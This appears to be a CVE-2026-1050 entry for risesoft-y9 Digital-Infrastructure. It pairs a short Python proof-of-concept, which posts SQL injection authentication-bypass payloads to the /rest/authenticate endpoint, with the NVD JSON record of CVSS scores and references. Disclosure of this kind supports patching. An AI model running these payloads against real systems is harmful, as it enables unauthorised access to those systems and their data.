CVE-2026-1050

import requests import sys # CVE-2026-1050 SQL Injection PoC # Target: risesoft-y9 Digital-Infrastructure REST Authenticate Endpoint target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080" endpoint = f"{target_url}/rest/authenticate" # Basic authentication bypass payloads payloads = [ "admin' OR '1'='1", "' OR 1=1--", "' UNION SELECT NULL--", "admin'--" ] headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } print(f"[*] Testing CVE-2026-1050 SQL Injection on {endpoint}") for payload in payloads: data = { "username": payload, "password": "any" } try: response = requests.post(endpoint, json=data, headers=headers, timeout=10) print(f"[+] Payload: {payload}") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}") except Exception as e: print(f"[-] Error with payload {payload}: {e}")

{"cve": {"id": "CVE-2026-1050", "sourceIdentifier": "[email protected]", "published": "2026-01-17T18:15:48.917", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in risesoft-y9 Digital-Infrastructure up to 9.6.7. This affects an unknown function of the file source-code/src/main/java/net/risesoft/util/Y9PlatformUtil.java of the component REST Authenticate Endpoint. Executing a manipulation can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en risesoft-y9 Digital-Infrastructure hasta la versión 9.6.7. Afecta a una función desconocida del archivo source-code/src/main/java/net/risesoft/util/Y9PlatformUtil.java del componente REST Authenticate Endpoint. La ejecución de una manipulación puede conducir a una inyección SQL. El ataque puede lanzarse de forma remota. El exploit ha sido publicado y puede ser utilizado. El proyecto fue notificado del problema con antelación a través de un informe de incidencias, pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/risesoft-y9/Digital-Infrastructure/", "source": "[email protected]"}, {"url": "https://github.com/risesoft-y9/Digital-Infrastructure/issues/2", "source": "[email protected]"}, {"url": "https://github.com/risesoft-y9/Digital-Infrastructure/issues/2#issue-3777863959", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.341603", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.341603", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.731010", "source": "[email protected]"}]}}